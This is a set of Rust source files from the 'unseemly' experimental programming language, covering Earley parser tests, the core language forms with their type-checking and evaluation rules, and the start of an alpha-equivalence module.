); let toks_a_b = tokens_s!("a" "b"); assert_eq!( crate::earley::parse_in_syn_env( &form_pat!((call "Expr")), syn_env!( "other_1" => (scope simple_form("o", form_pat!((lit_aat "other")))), "Expr" => (scope pair_form.clone()), "other_2" => (scope simple_form("o", form_pat!((lit_aat "otherother")))) ), &toks_a_b ) .unwrap(), ast!({pair_form ; ["rhs" => "b", "lhs" => "a"]}) ); } // TODO: We pretty much have to use Rc<> to store grammars in Earley // (that's fine; they're Rc<> already!). // But then, we pretty much have to store Earley rules in Rc<> also (ick!)... // ...and how do we test for equality on grammars and rules? // I think we pretty much need to force memoization on the syntax extension functions... #[test] fn extensible_parsing() { use crate::{ ast::AstContents::IncompleteNode, earley::{parse_in_syn_env, ParseContext}, }; fn static_synex(pc: ParseContext, _: Ast) -> ParseContext { ParseContext { grammar: assoc_n!( "a" => Rc::new(form_pat!( (star (named "c", (alt (lit_aat "AA"), [(lit_aat "Back"), (call "o"), (lit_aat "#")]))))), "b" => Rc::new(form_pat!((lit_aat "BB"))) ) .set_assoc(&pc.grammar), ..pc } } assert_eq!( parse_top(&form_pat!((extend_nt [], "b", static_synex)), tokens_s!("BB")), Ok(ast_shape!(() "BB")) ); let orig = assoc_n!( "o" => Rc::new(form_pat!( (star (named "c", (alt (lit_aat "O"), [(lit_aat "Extend"), (extend_nt [], "a", static_synex), (lit_aat "#")])))))); assert_eq!( parse_in_syn_env( &form_pat!((call "o")), orig.clone(), tokens_s!("O" "O" "Extend" "AA" "AA" "Back" "O" "#" "AA" "#" "O") ) .unwrap(), ast!({- "c" => ["O", "O", ("Extend" (() {- "c" => ["AA", "AA", ("Back" {- "c" => ["O"]} "#"), "AA"]}) "#"), "O"]}) ); assert_eq!( parse_in_syn_env( &form_pat!((call "o")), orig.clone(), tokens_s!("O" "O" "Extend" "AA" "AA" "Back" "AA" "#" "AA" "#" "O") ) .is_err(), true ); assert_eq!( parse_in_syn_env( &form_pat!((call "o")), orig.clone(), tokens_s!("O" "O" "Extend" "O" "#" "O") ) .is_err(), true ); fn counter_synex(_: ParseContext, a: Ast) -> ParseContext { let count = match a.c() { IncompleteNode(mbe) => mbe, _ => panic!(), } .get_rep_leaf_or_panic(n("n")) .len(); ParseContext::new_from_grammar( assoc_n!("count" => Rc::new(Literal(Rc::new(new_scan(r"\s*(\S+)", None)), n(&count.to_string())))), ) } assert_m!( parse_top( &form_pat!((extend_nt (star (named "n", (lit_aat "X"))), "count", counter_synex)), tokens_s!("X" "X" "X" "4") ), Err(_) ); assert_eq!( parse_top( &form_pat!((extend_nt (star (named "n", (lit_aat "X"))), "count", counter_synex)), tokens_s!("X" "X" "X" "X" "4") ), Ok(ast_shape!({- "n" => ["X", "X", "X", "X"]} "4")) ); assert_m!( parse_top( &form_pat!((extend_nt (star (named "n", (lit_aat "X"))), "count", counter_synex)), tokens_s!("X" "X" "X" "X" "X" "4") ), Err(_) ); } // #[test] // fn test_syn_env_parsing() as{ // let mut se = Assoc::new(); // se = se.set(n("xes"), Box::new(Form { grammar: form_pat!((star (lit_aat "X")), // relative_phase)})) // }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/core_forms.rs
src/core_forms.rs
// This virtual machine kills cyber-fascists. use crate::{ ast::*, ast_walk::{LazyWalkReses, WalkRule::*}, core_type_forms::*, form::Form, grammar::{ FormPat::{self, *}, SynEnv, }, name::*, runtime::eval::*, ty::*, util::assoc::Assoc, }; use std::rc::Rc; // type forms are kinda bulky // Core forms! // // This is the definition of Unseemly, the bizarre boiled-down programming language. // // Unseemly programs have expressions and types (and probably kinds, too). /// Remove an `ExtendEnv` without respecting its binding behavior. /// This is safe if directly inside a `Node` that was just freshened. /// (TODO: think about what "just" means here. It's super-subtle!) pub fn strip_ee(a: &Ast) -> &Ast { match a.c() { ExtendEnv(body, _) => &*body, ExtendEnvPhaseless(body, _) => &*body, _ => icp!("Not an EE"), } } pub fn strip_ql(a: &Ast) -> &Ast { match a.c() { QuoteLess(body, _) => &*body, _ => icp!("Not an unquote"), } } // lambda ==> [param: Atom p_t: Type]* body: Expr fn type_lambda(part_types: LazyWalkReses<SynthTy>) -> TypeResult { let lambda_type: Ast = ast!({ find_type("fn") ; "param" => [* part_types =>("param") part_types : (, part_types.get_res(n("p_t"))? )], "ret" => (, part_types.get_res(n("body"))? )}); Ok(lambda_type) } fn eval_lambda(part_values: LazyWalkReses<Eval>) -> Result<Value, ()> { Ok(Function(Rc::new(Closure { body: strip_ee(part_values.get_term_ref(n("body"))).clone(), params: part_values.get_rep_term(n("param")).iter().map(Ast::to_name).collect(), env: part_values.env, }))) } // apply ==> rator: Expr [rand: Expr]* fn type_apply(part_types: LazyWalkReses<SynthTy>) -> TypeResult { use crate::walk_mode::WalkMode; let return_type = crate::ty_compare::Subtype::underspecified(n("<return_type>")); // The `rator` must be a function that takes the `rand`s as arguments: let _ = crate::ty_compare::is_subtype( &ast!({ "Type" "fn" : "param" => (,seq part_types.get_rep_res(n("rand"))? ), "ret" => (, return_type.clone() )}), &part_types.get_res(n("rator"))?, &part_types, ) .map_err(|e| crate::util::err::sp(e, part_types.this_ast.clone()))?; // TODO: write a test that exercises this (it's used in the prelude) // What return type made that work? crate::ty_compare::unification.with(|unif| { let res = crate::ty_compare::resolve( crate::ast_walk::Clo { it: return_type, env: part_types.env.clone() }, &unif.borrow(), ); // Canonicalize the type in its environment: let res = crate::ty_compare::canonicalize(&res.it, res.env); res.map_err(|e| crate::util::err::sp(e, part_types.this_ast.clone())) }) } fn eval_apply(part_values: LazyWalkReses<Eval>) -> Result<Value, ()> { match part_values.get_res(n("rator"))? { Function(clos) => { let mut new_env = clos.env.clone(); for (p, v) in clos.params.iter().zip(part_values.get_rep_res(n("rand"))?) { new_env = new_env.set(*p, v); } // TODO: this seems wrong; it discards other phase information. // But would it be correct to have closures capture at all phases? crate::runtime::eval::eval(&clos.body, new_env) } BuiltInFunction(crate::runtime::eval::BIF(f)) => Ok(f(part_values.get_rep_res(n("rand"))?)), other => { icp!("[type error] invoked {:#?} as if it were a function", other) } } } // match ==> scrutinee: Expr [p: Pat arm: Expr]* fn type_match(part_types: LazyWalkReses<SynthTy>) -> TypeResult { let mut res: Option<Ast> = None; for arm_part_types in part_types.march_parts(&[n("arm"), n("p")]) { // We don't need to manually typecheck that the arm patterns match the scrutinee; // the import handles that for us. let arm_res = arm_part_types.get_res(n("arm"))?; match res { None => res = Some(arm_res), Some(ref old_res) => { ty_exp!(old_res, &arm_res, arm_part_types.get_term(n("arm"))); } } } match res { None => { // TODO #2: this isn't anywhere near exhaustive ty_err!(NonExhaustiveMatch(part_types.get_res(n("scrutinee")).unwrap()) at ast!((trivial)) /* TODO */) } Some(ty_res) => Ok(ty_res), } } fn eval_match(part_values: LazyWalkReses<Eval>) -> Result<Value, ()> { for arm_values in part_values.march_all(&[n("arm"), n("p")]) { // TODO: don't we need to set a context? match arm_values.get_res(n("arm")) { Ok(res) => { return Ok(res); } Err(()) => { /* try the next one */ } } } panic!("No arms matched! TODO #2"); } // enum_expr ==> name: Atom [component: Expr]* fn type_enum_expr(part_types: LazyWalkReses<SynthTy>) -> TypeResult { let res: Ast = part_types.get_res(n("t"))?; expect_ty_node!( (res ; find_type("enum") ; &part_types.this_ast) enum_type_parts; { for enum_type_part in enum_type_parts.march_all(&[n("name"), n("component")]) { if &part_types.get_term(n("name")) != enum_type_part.get_leaf_or_panic(&n("name")) { continue; // not the right arm } let component_types : Vec<&Ast> = enum_type_part.get_rep_leaf_or_panic(n("component")); // TODO: check that they're the same length! for (t, expected_t) in part_types.get_rep_res(n("component"))? .iter().zip(component_types) { ty_exp!(t, expected_t, part_types.this_ast); } return Ok(res); } ty_err!(NonexistentEnumArm(part_types.get_term(n("name")).to_name(), res) at part_types.this_ast); } ) } fn eval_enum_expr(part_values: LazyWalkReses<Eval>) -> Result<Value, ()> { Ok(Enum(part_values.get_term(n("name")).to_name(), part_values.get_rep_res(n("component"))?)) } // struct_expr ==> [component_name: Atom component: Expr]* fn type_struct_expr(part_types: LazyWalkReses<SynthTy>) -> TypeResult { Ok(ast!({ find_type("struct") ; "component_name" => (@"c" ,seq part_types.get_rep_term(n("component_name"))), "component" => (@"c" ,seq part_types.get_rep_res(n("component"))?) })) } fn eval_struct_expr(part_values: LazyWalkReses<Eval>) -> Result<Value, ()> { let mut res = Assoc::new(); for component_parts in part_values.march_parts(&[n("component"), n("component_name")]) { res = res.set( component_parts.get_term(n("component_name")).to_name(), component_parts.get_res(n("component"))?, ); } Ok(Struct(res)) } // tuple_expr ==> [component: Expr]* fn type_tuple_expr(part_types: LazyWalkReses<SynthTy>) -> TypeResult { Ok(ast!({ find_type("tuple") ; "component" => (,seq part_types.get_rep_res(n("component"))?)})) } fn eval_tuple_expr(part_values: LazyWalkReses<Eval>) -> Result<Value, ()> { Ok(crate::runtime::eval::Value::Sequence( part_values.get_rep_res(n("component"))?.into_iter().map(Rc::new).collect(), )) } // unfold ==> body: Expr fn type_unfold(part_types: LazyWalkReses<SynthTy>) -> TypeResult { // TODO: this "evaluates" types twice; once in `get_res` and once in `synth_type` // It shouldn't be necessary, and it's probably quadratic. // Maybe this points to a weakness in the LiteralLike approach to traversing types? let mu_typed = part_types.get_res(n("body"))?; // Pull off the `mu` (and the `ExtendEnv` that it carries): // (This is sound because `mu`'s param must already be in the environment.) expect_ty_node!( (mu_typed ; find_type("mu_type") ; &part_types.this_ast) mu_parts; { // This acts like the `mu` was never there (and hiding the binding) if let ExtendEnv(body, _) = mu_parts.get_leaf_or_panic(&n("body")).c() { synth_type(body, part_types.env) } else { icp!("no protection to remove!"); } }) } // fold ==> body: Expr t: Type fn type_fold(part_types: LazyWalkReses<SynthTy>) -> TypeResult { let goal_type = part_types.get_res(n("t"))?; // TODO: I can't figure out how to pull this out into a function // to invoke both here and above, since `mu_type_0` needs cloning... let folded_goal = expect_ty_node!( (goal_type.clone() ; find_type("mu_type") ; &part_types.this_ast) mu_parts; { // This acts like the `mu` was never there (and hiding the binding) if let ExtendEnv(ref body, _) = mu_parts.get_leaf_or_panic(&n("body")).c() { synth_type(body, part_types.env.clone())? } else { icp!("no protection to remove!"); } }); ty_exp!(&part_types.get_res(n("body"))?, &folded_goal, part_types.this_ast); Ok(goal_type) } // forall_expr ==> [param: Atom]* body: Expr fn type__forall_expr(part_types: LazyWalkReses<SynthTy>) -> TypeResult { Ok(ast!({"Type" "forall_type" : "param" => (,seq part_types.get_rep_term(n("param"))), "body" => (import [* [forall "param"]] (, part_types.get_res(n("body"))?)) })) } // TODO: pull out all the other form implementations into freestanding functions. /// This is the Unseemly language. pub fn make_core_syn_env() -> SynEnv { // HACK: this is around the first thing that happens, so install a panic hook. #[cfg(not(target_arch = "wasm32"))] color_backtrace::install(); // Nice backtraces #[cfg(target_arch = "wasm32")] std::panic::set_hook(Box::new(console_error_panic_hook::hook)); // Backtrace to console let ctf: SynEnv = get_core_types(); let cmf: SynEnv = crate::core_macro_forms::make_core_macro_forms(); // Unseemly expressions let main_expr_forms = forms_to_form_pat![ typed_form!("lambda", (delim ".[", "[", [ // TODO: add comma separators to the syntax! (star [(named "param", atom), (lit ":"), (named "p_t", (call "Type"))]), (lit "."), (named "body", (import [* ["param" : "p_t"]], (call "Expr")))]), cust_rc_box!(type_lambda), cust_rc_box!(eval_lambda)), typed_form!("apply", /* function application*/ (delim "(", "(", [(named "rator", (call "Expr")), (star (named "rand", (call "Expr")))]), cust_rc_box!(type_apply), cust_rc_box!(eval_apply)), typed_form!("match", [(lit "match"), (named "scrutinee", (call "Expr")), (delim "{", "{", (plus [(named "p", (call "Pat")), (lit "=>"), (named "arm", (import ["p" = "scrutinee"], (call "Expr")))]))], cust_rc_box!(type_match), cust_rc_box!(eval_match) ), // Note that we inconveniently require the user to specify the type. // "real" languages infer the type from the (required-to-be-unique) // component name. typed_form!("enum_expr", [(delim "+[", "[", [(named "name", atom), (star (named "component", (call "Expr")))]), (lit ":"), (named "t", (call "Type"))], cust_rc_box!(type_enum_expr), cust_rc_box!(eval_enum_expr)), typed_form!("struct_expr", (delim "*[", "[", (star [(named "component_name", atom), (lit ":"), (named "component", (call "Expr"))])), cust_rc_box!(type_struct_expr), cust_rc_box!(eval_struct_expr)), typed_form!("tuple_expr", (delim "**[", "[", (star (named "component", (call "Expr")))), cust_rc_box!(type_tuple_expr), cust_rc_box!(eval_tuple_expr) ), // e.g. // let_type // pair = mu lhs rhs. {l: lhs, r: rhs} // point = pair<int, int> // in ... typed_form!("let_type", [(lit "let_type"), (named "type_kind_stx", (anyways "*")), (star [(named "type_name", atom), (lit "="), (named "type_def", (import [* ["type_name" = "type_def"]], (call "Type")))]), (lit "in"), (named "body", (import [* ["type_name" = "type_def"]], (call "Expr")))], Body(n("body")), // HACK: like `Body(n("body"))`, but ignoring the binding, since it's type-level. // This feels like it ought to be better-handled by `beta`, or maybe a kind system. cust_rc_box!( move | let_type_parts | { crate::ast_walk::walk::<Eval>( strip_ee(&let_type_parts.get_term(n("body"))), &let_type_parts) })), // e.g. where List = ∀ X. μ List. enum { Nil(), Cons(X, List<X>) } // .[x : List<X> . match (unfold x) ... ]. // (unfold is needed because `match` wants an `enum`, not a `μ`) // Exposes the inside of a μ type by performing one level of substitution. typed_form!("unfold", [(lit "unfold"), (named "body", (call "Expr"))], cust_rc_box!(type_unfold), Body(n("body"))), // e.g. where List = ∀ X. μ List. enum { Nil (), Cons (X, List<X>) } // (.[x : List<X> . ...]. (fold +[Nil]+) ) : List<X> typed_form!("fold", [(lit "fold"), (named "body", (call "Expr")), (lit ":"), (named "t", (call "Type"))], cust_rc_box!(type_fold), Body(n("body"))), typed_form!("forall_expr", [(lit "forall"), (star (named "param", atom)), (lit "."), (named "body", (import [* [forall "param"]], (call "Expr")))], cust_rc_box!(type__forall_expr), Body(n("body"))), crate::core_qq_forms::quote(/* positive= */ true), crate::core_macro_forms::extend_syntax() ]; let main_pat_forms = forms_to_form_pat_export![ negative_typed_form!("enum_pat", (delim "+[", "[", [(named "name", atom), (star (named "component", (call "Pat")))]), /* (Negatively) Typecheck: */ cust_rc_box!( move | part_types | expect_ty_node!( (part_types.context_elt() ; find_type("enum") ; &part_types.this_ast) enum_type_parts; { let arm_name = &part_types.get_term(n("name")); for enum_type_part in enum_type_parts .march_all(&[n("name"), n("component")]) { if arm_name != enum_type_part.get_leaf_or_panic(&n("name")) { continue; // not the right arm } let component_types : Vec<Ast> = enum_type_part.get_rep_leaf_or_panic(n("component")).into_iter().cloned().collect(); let mut res = Assoc::new(); for sub_res in &part_types .get_rep_res_with(n("component"), component_types)? { res = res.set_assoc(sub_res); } return Ok(res); } ty_err!(NonexistentEnumArm(arm_name.to_name(), ast!((trivial))) /* TODO `LazyWalkReses` needs more information */ at arm_name.clone()) } )), /* (Negatively) Evaluate: */ cust_rc_box!( move | part_values | { match *part_values.context_elt() /* : Value */ { Enum(ref name, ref elts) => { // "Try another branch" if name != &part_values.get_term(n("name")).to_name() { return Err(()); } let mut res = Assoc::new(); for sub_res in &part_values.get_rep_res_with(n("component"), elts.clone())? { res = res.set_assoc(sub_res); } Ok(res) } _ => icp!("[type error] non-enum") } })) => [* ["component"]], negative_typed_form!("struct_pat", [(delim "*[", "[", (star [(named "component_name", atom), (lit ":"), (named "component", (call "Pat"))]))], /* (Negatively) typesynth: */ cust_rc_box!( move | part_types | expect_ty_node!( (part_types.context_elt() ; find_type("struct") ; &part_types.this_ast) struct_type_parts; { let mut res = Assoc::new(); for component_ctx in part_types .march_parts(&[n("component"), n("component_name")]) { let mut component_found = false; for struct_type_part in struct_type_parts .march_all(&[n("component"), n("component_name")]) { if &component_ctx.get_term(n("component_name")) != struct_type_part.get_leaf_or_panic(&n("component_name")) { continue; } component_found = true; let component_type = struct_type_part.get_leaf_or_panic(&n("component")).clone(); res = res.set_assoc( &component_ctx.with_context(component_type) .get_res(n("component"))?); break; } if !component_found { ty_err!(NonexistentStructField( component_ctx.get_term(n("component_name")).to_name(), part_types.context_elt().clone()) at part_types.get_rep_term(n("component"))[0].clone()); } } Ok(res) })), cust_rc_box!( move | part_values | { match *part_values.context_elt() { Struct(ref contents) => { let mut res = Assoc::new(); for component_ctx in part_values .march_parts(&[n("component"), n("component_name")]) { res = res.set_assoc( &component_ctx .with_context(contents.find_or_panic( &component_ctx.get_term(n("component_name")).to_name()) .clone()) .get_res(n("component"))?); } Ok(res) } _ => icp!("[type error] non-struct") } })) => [* ["component"]], negative_typed_form!("tuple_pat", (delim "**[", "[", (star (named "component", (call "Pat")))), cust_rc_box!( move |part_types| expect_ty_node!( (part_types.context_elt() ; find_type("tuple") ; &part_types.this_ast) ctxt_type_parts; { let component_types : Vec<Ast> = ctxt_type_parts.get_rep_leaf_or_panic(n("component")) .into_iter().cloned().collect(); let mut res = Assoc::new(); for sub_res in &part_types .get_rep_res_with(n("component"), component_types)? { res = res.set_assoc(sub_res); } return Ok(res); } )), cust_rc_box!( move |part_values| { match *part_values.context_elt() { Sequence(ref sub_vals) => { let sub_vals: Vec<Value> = sub_vals.iter() .map(|rcv: &Rc<Value>| (**rcv).clone()).collect(); let mut res = Assoc::new(); for sub_res in &part_values.get_rep_res_with(n("component"), sub_vals)? { res = res.set_assoc(sub_res); } Ok(res) } _ => icp!("[type error] non-tuple") } }) ) => [* ["component"]], // TODO #16: We need a pattern for destructuring tuples. crate::core_qq_forms::quote(/*positive=*/false) => ["body"]]; let reserved_names = vec![ n("forall"), n("mu_type"), n("Ident"), n("Int"), n("Nat"), n("Float"), n("String"), n("match"), n("enum"), n("struct"), n("fold"), n("unfold"), n("extend_syntax"), n("in"), n("import"), n("capture_language"), ]; syn_env!( "Pat" => (biased (,main_pat_forms), (call "DefaultAtom")), "Expr" => (biased (alt (, main_expr_forms), (, crate::core_extra_forms::make_core_extra_forms())), (call "DefaultReference")), "Ident" => (call "DefaultAtom"), "AtomNotInPat" => (call "DefaultAtom"), "DefaultReference" => (varref_call "DefaultAtom"), "DefaultSeparator" => (scan r"(\s*)"), "DefaultAtom" => (common (reserved_by_name_vec (call "DefaultWord"), reserved_names)), "DefaultWord" => (common (pick [(call "DefaultSeparator"), (named "name", (scan_cat r"(\p{Letter}(?:\p{Letter}|\p{Number}|[_?])*)", "variable"))], "name")), // TODO: come up with more normal tokenization rules. // HACK: it's really confusing to weld semicolon and colon onto brackets, so exempt them. "OpenDelim" => (common (pick [(call "DefaultSeparator"), (named "tok", (scan_cat r"([^\[\]\(\)\{\}\s;:]*[\[\(\{])", "paren.lparen"))], "tok")), "CloseDelim" => (common (pick [(call "DefaultSeparator"), (named "tok", (scan_cat r"([\]\)\}][^\[\]\(\)\{\}\s;:]*)", "paren.rparen"))], "tok")), "DefaultToken" => (common (pick [(call "DefaultSeparator"), (named "tok", (scan r"([^\[\]\(\)\{\}\s]+)"))], "tok")) ) .set_assoc(&ctf) // throw in types! .set_assoc(&cmf) // throw in the types and macros! } /// Mostly for testing purposes, this looks up forms by name. /// In the "real world", programmers look up forms by syntax, using a parser. pub fn find_form(se: &SynEnv, nt: &str, form_name: &str) -> Rc<Form> { fn find_form_rec(f: &FormPat, form_name: &str) -> Option<Rc<Form>> { match *f { Scope(ref f, _) => { if f.name.is(form_name) { Some(f.clone()) } else { None } } Alt(ref vf) => { for f in vf { let res = find_form_rec(f, form_name); if res.is_some() { return res; } } None } Biased(ref lhs, ref rhs) => { let l_res = find_form_rec(lhs, form_name); if l_res.is_some() { l_res } else { find_form_rec(rhs, form_name) } } _ => None, } } let pat = se.find_or_panic(&n(nt)); find_form_rec(pat, form_name) .unwrap_or_else(|| icp!("{:#?} not found in {:#?}", form_name, pat)) } // Inserts a new form into a grammar in the "sensible" place // (underneath any number of `Biased`s, as a new arm of an `Alt`). // Macros will usually want to do this to extend an existing NT. pub fn insert_form_pat(se: &SynEnv, nt: Name, f: &FormPat) -> SynEnv { let nt_form: Rc<FormPat> = se.find_or_panic(&nt).clone(); se.set(nt, Rc::new(add_form_at_the_alt(nt_form, f).unwrap())) } pub fn add_form_at_the_alt(outer: Rc<FormPat>, inner: &FormPat) -> Option<FormPat> { match *outer { Biased(ref l, ref r) => { if let Some(new_l) = add_form_at_the_alt(l.clone(), inner) { return Some(Biased(Rc::new(new_l), r.clone())); } if let Some(new_r) = add_form_at_the_alt(r.clone(), inner) { return Some(Biased(l.clone(), Rc::new(new_r))); } return None; } Alt(ref subs) => { let mut my_subs: Vec<Rc<FormPat>> = subs.clone(); my_subs.push(Rc::new(inner.clone())); return Some(Alt(my_subs)); } _ => None, } } thread_local! { pub static core_forms: SynEnv = make_core_syn_env(); } pub fn outermost_form() -> FormPat { // `(call "Expr")`, except allowing whitespace (etc) at the end of a file: form_pat!((pick [(named "program", (call "Expr")), (call "DefaultSeparator")], "program")) } pub fn outermost__parse_context() -> crate::earley::ParseContext { crate::earley::ParseContext { grammar: get_core_forms(), type_ctxt: crate::ast_walk::LazyWalkReses::new_wrapper( crate::runtime::core_values::core_types(), ), eval_ctxt: crate::ast_walk::LazyWalkReses::new_wrapper( crate::runtime::core_values::core_values(), ), } } pub fn find(nt: &str, name: &str) -> Rc<Form> { core_forms.with(|cf| find_form(cf, nt, name)) } // Deprecated; use `::core_forms::find` instead (keep it qualified!) pub fn find_core_form(nt: &str, name: &str) -> Rc<Form> { find(nt, name) } pub fn get_core_forms() -> SynEnv { core_forms.with(|cf| cf.clone()) } #[test] fn form_grammar() { assert_eq!( crate::grammar::parse( &form_pat!((call "Type")), outermost__parse_context(), tokens_s!("[" "Ident" "->" "Ident" "]"), ), Ok(ast!({ find("Type", "fn"); ["ret" => {find("Type", "Ident") ; []}, "param" => [{find("Type", "Ident") ; []}]]})) ); } #[test] fn form_expect_node() { let ast = u!({apply : f [x]}); let _: Result<(), ()> = expect_node!( ( ast ; find_core_form("Expr", "apply")) env; { assert_eq!(env.get_leaf_or_panic(&n("rator")), &ast!((vr "f"))); assert_eq!(env.get_rep_leaf_or_panic(n("rand")), vec![&ast!((vr "x"))]); Ok(()) }); } #[test] fn form_type() { let simple_ty_env = assoc_n!( "x" => uty!({Int :}), "n" => uty!({Nat :})); assert_eq!(synth_type(&ast!( (vr "x") ), simple_ty_env.clone()), Ok(uty!({Int :}))); assert_eq!( synth_type(&u!({lambda : [y {Type Nat :}] x}), simple_ty_env.clone()), Ok(uty!({fn : [{Nat :}] {Int :}})) ); } #[test] fn type_apply_with_subtype() { // Application can perform subtyping let nat_ty = ast!({ "Type" "Nat" : }); let ty_env = assoc_n!( "N" => uty!({Nat :}), "nat_to_nat" => uty!({fn : [{Nat :}] {Nat :}}), "forall_t_t_to_t" => uty!({forall_type : [T] {fn : [T] T}})); assert_eq!(synth_type(&u!({apply : nat_to_nat [N]}), ty_env.clone()), Ok(nat_ty.clone())); assert_eq!(synth_type(&u!({apply : forall_t_t_to_t [N]}), ty_env.clone()), Ok(nat_ty.clone())); } #[test] fn form_eval() { use num::bigint::ToBigInt; let simple_env = assoc_n!("x" => val!(i 18), "w" => val!(i 99), "b" => val!(b false)); assert_eq!(eval(&ast!((vr "x")), simple_env.clone()), Ok(Int(18.to_bigint().unwrap()))); // (λy.w) x assert_eq!( eval(&u!({apply : {lambda : [y {Type Int :}] w} [x]}), simple_env.clone()), Ok(Int(99.to_bigint().unwrap())) ); // (λy.y) x assert_eq!( eval(&u!({apply : {lambda : [y {Type Int :}] y} [x]}), simple_env.clone()), Ok(Int(18.to_bigint().unwrap())) ); } #[test] fn alg_type() { let mt_ty_env = Assoc::new(); let simple_ty_env = assoc_n!( "x" => uty!({Type Int :}), "n" => uty!({Type Nat :}), "f" => uty!({Type Float :})); let my_enum = ast!({ "Type" "enum" : "name" => [@"c" "Adams", "Jefferson", "Burr"], "component" => [@"c" [{"Type" "Int":}], [{"Type" "Int":}, {"Type" "Nat":}], [{"Type" "Float" :}, {"Type" "Float" :}]] }); // Typecheck enum pattern assert_eq!( neg_synth_type( &u!({Pat enum_pat : Jefferson [(at abc) ; (at def)]}), mt_ty_env.set(negative_ret_val(), my_enum.clone()) ), Ok(Assoc::new().set(n("abc"), ast!({"Type" "Int":})).set(n("def"), ast!({"Type" "Nat":}))) ); // Typecheck enum expression assert_eq!( synth_type(&u!({enum_expr : Jefferson [x ; n] (, my_enum.clone())}), simple_ty_env.clone()), Ok(my_enum.clone()) ); let my_struct = ast!({ "Type" "struct" : "component_name" => [@"c" "x", "y"], "component" => [@"c" {"Type" "Int":}, {"Type" "Float" :}] }); // Typecheck struct pattern assert_eq!( neg_synth_type( &ast!( { "Pat" "struct_pat" : "component_name" => [@"c" "y", "x"], "component" => [@"c" "yy", "xx"] }), mt_ty_env.set(negative_ret_val(), my_struct.clone()) ), Ok(assoc_n!("yy" => ast!({"Type" "Float" :}), "xx" => ast!({"Type" "Int":}))) ); // Typecheck struct expression // TODO: currently {x: integer, y: float} ≠ {y: float, x: integer} // Implement proper type equality! assert_eq!( synth_type( &ast!( { "Expr" "struct_expr" : "component_name" => [@"c" "x", "y"], "component" => [@"c" (vr "x"), (vr "f")] }), simple_ty_env.clone() ), Ok(my_struct) ); // Typecheck tuple expression assert_eq!( synth_type(&u!({ tuple_expr: [x; f] }), simple_ty_env.clone()), Ok(uty!({tuple : [{Int :}; {Float :}]})) ); // Simple match... assert_eq!( synth_type( &u!({Expr match : f [(at my_new_name) my_new_name; (at unreachable) f]}), simple_ty_env.clone() ), Ok(ast!({"Type" "Float" :})) ); assert_m!( synth_type( &u!({Expr match : n [(at my_new_name) my_new_name; (at unreachable) f]}), simple_ty_env.clone() ), ty_err_p!(Mismatch(_, _)) ); assert_m!( synth_type( &u!({Expr match : my_enum [{Pat enum_pat => [* ["component"]] : Hamilton [(at ii)]} ii]}), simple_ty_env.set(n("my_enum"), my_enum.clone()) ), ty_err_p!(NonexistentEnumArm(_, _)) // Never gonna be president... ); assert_eq!( synth_type( &u!({Expr match : my_enum [{Pat enum_pat => [* ["component"]] : Adams [(at ii)]} ii; {Pat enum_pat => [* ["component"]] : Jefferson [(at ii) ; (at bb)]} ii; {Pat enum_pat => [* ["component"]] : Burr [(at xx) ; (at yy)]} x]}), simple_ty_env.set(n("my_enum"), my_enum.clone()) ), Ok(ast!({"Type" "Int":})) ); assert_eq!( synth_type(
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
true
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/alpha.rs
src/alpha.rs
// Alpha-equivalence utilities. // Based on https://repository.library.northeastern.edu/files/neu:cj82mb52h // `freshen` gets a value ready for destructuring. // `freshen_rec` gets a value and its pattern ready for destructuring. use crate::{ ast::{Ast, AstContents::*}, name::*, util::{assoc::Assoc, mbe::EnvMBE}, }; // A renaming that only affects names at the "current" quotation level #[derive(Clone, Debug, PartialEq)] pub struct Ren { env: Assoc<Name, Ast>, env_phaseless: Assoc<Name, Ast>, q_lev: i16, } impl Ren { pub fn find(&self, n: Name) -> Option<&Ast> { if self.q_lev == 0 { self.env.find(&n).or_else(|| self.env_phaseless.find(&n)) } else { self.env_phaseless.find(&n) } } pub fn unset(self, n: Name) -> Ren { if self.q_lev == 0 { Ren { env: self.env.unset(&n), env_phaseless: self.env_phaseless.unset(&n), q_lev: self.q_lev, } } else { self } } pub fn set_assoc(self, other: &Ren) -> Ren { if self.q_lev == other.q_lev { Ren { env: self.env.set_assoc(&other.env), env_phaseless: self.env_phaseless.set_assoc(&other.env_phaseless), q_lev: self.q_lev, } } else { self } } pub fn q_more(&self, by: u8) -> Ren { Ren { q_lev: self.q_lev + i16::from(by), ..self.clone() } } pub fn q_less(&self, by: u8) -> Ren { Ren { q_lev: self.q_lev - i16::from(by), ..self.clone() } } pub fn new() -> Ren { Ren { env: Assoc::new(), env_phaseless: Assoc::new(), q_lev: 0 } } pub fn single(n: Name, a: Ast) -> Ren { Ren { env: Assoc::new().set(n, a), ..Ren::new() } } pub fn become_phaseless(self) -> Ren { // TODO: which order is right? What could even cause shadowing between these things? Ren { env_phaseless: self.env_phaseless.set_assoc(&self.env), env: Assoc::new(), q_lev: self.q_lev, } } /// For debugging: find a freshening based on `orig_sp` (the never-fresehened spelling). pub fn find_orig(&self, orig: &str) -> Option<(Name, Ast)> { for (k, v) in self.env.iter_pairs() { if k.orig_sp() == orig { return Some((*k, v.clone())); } } for (k, v) in self.env_phaseless.iter_pairs() { if k.orig_sp() == orig { return Some((*k, v.clone())); } } None } } impl From<Assoc<Name, Ast>> for Ren { fn from(a: Assoc<Name, Ast>) -> Ren { Ren { env: a, ..Ren::new() } } } fn substitute_rec(node: &Ast, cur_node_contents: &EnvMBE<Ast>, env: &Ren) -> Ast { match node.c() { Node(ref f, ref new_parts, ref export) => { // let new_cnc = parts.clone(); node.with_c(Node( f.clone(), new_parts.marched_map(&mut |_, marched_parts: &EnvMBE<Ast>, part: &Ast| { substitute_rec(part, marched_parts, env) }), export.clone(), )) } VariableReference(n) => env.find(*n).unwrap_or(&node.clone()).clone(), ExtendEnv(ref body, ref beta) => { let mut new_env = env.clone(); for bound_name in crate::beta::bound_from_beta(beta, cur_node_contents, 0) { new_env = new_env.unset(bound_name); } node.with_c(ExtendEnv(substitute_rec(body, cur_node_contents, &new_env), beta.clone())) } ExtendEnvPhaseless(ref body, ref beta) => { let mut new_env = env.clone(); for bound_name in crate::beta::bound_from_beta(beta, cur_node_contents, 0) { new_env = new_env.unset(bound_name); } node.with_c(ExtendEnvPhaseless( substitute_rec(body, cur_node_contents, &new_env), 